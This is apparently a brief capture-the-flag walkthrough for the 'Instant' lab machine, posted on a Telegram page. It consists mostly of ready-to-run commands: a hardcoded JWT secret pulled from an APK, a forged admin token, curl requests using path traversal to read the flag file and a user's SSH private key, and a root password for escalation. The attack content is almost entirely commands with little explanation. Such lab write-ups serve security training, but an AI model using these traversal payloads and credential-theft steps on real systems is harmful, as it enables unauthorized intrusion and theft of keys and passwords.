Instant

Instant



Recon 



sudo echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts


Go to the website


When you click on the ‘DOWNLOAD NOW’ button, the apk file is downloaded

wget http://instant.htb/downloads/instant.apk

Get JWT token from apk file. Secret key jwt -VeryStrongS3cretKeyY0uC4NTGET

Quick Solve 

sudo echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts


User flag 

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2Fuser.txt" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"


Root flag 

Get RSA Private key

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F.ssh%2Fid_rsa" -H  "accept: application/json" -H  "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

Copy RSA Private key to id_rsa

nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa shirohige@instant.htb



su root

root password - 12**24nzC!r0c%q12


cat /root/root.txt


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org